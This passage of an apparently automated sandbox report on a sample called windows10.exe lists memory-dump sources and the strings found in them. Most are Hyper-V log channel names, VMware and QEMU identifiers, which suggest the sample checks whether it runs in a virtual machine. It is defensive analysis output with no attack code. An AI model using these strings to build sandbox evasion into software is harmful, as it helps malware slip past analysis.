            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3321671075.000000000A058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminS
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic8
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513026110.00000000006F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A057000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationalp
            Source: windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A05F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminpZ
            Source: windows10.exe, 0000001D.00000002.4159390497.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh$fm`
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Admin\
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416637758.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic0
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminZ
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMHD
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Datacenter without Hyper-V Core
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMhL
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`(
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticS
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic]
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMUU
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug;
            Source: svchost.exe, 0000000E.00000002.4163150266.000001D04805A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4155354040.000001D042A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug@
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh,
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`(fm
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307359931.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMX
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh\
            Source: windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticP
            Source: windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticQ
            Source: windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin}
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin~
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose_
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugo
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2145511697.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fsSecureVirtualMachine
            Source: windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticXXO
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugm
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin|
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational$
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Adminz
            Source: windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3321671075.000000000A05D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnosel
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic6
            Source: windows10.exe, 0000001E.00000003.2355303518.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354825006.000000000A045000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-Analyticu
            Source: windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnoseo
            Source: windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A05F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A057000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-Analyticy
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnosek
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Datacenter without Hyper-V Full
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugb
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`P
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic%
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2680934915.000000000A053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic1
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic(
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Server
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic*
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh<fm
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Enterprise without Hyper-V Core
            Source: windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM` p8
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM``
            Source: windows10.exe, 0000001D.00000002.4159390497.000000000085D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\I
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: stVMWare
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationalalyticb
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admins
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2414735750.000000000071C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh4fm
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic}
            Source: windows10.exe, 0000001E.00000003.2674334142.000000000070F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`
            Source: windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic<C
            Source: windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMhWn
            Source: windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analyticy
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMWare
            Source: windows10.exe, 0000001E.00000003.2503011294.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational2
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnosticl
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose4
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628086106.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591296015.000000000071B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.000000000070A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMH
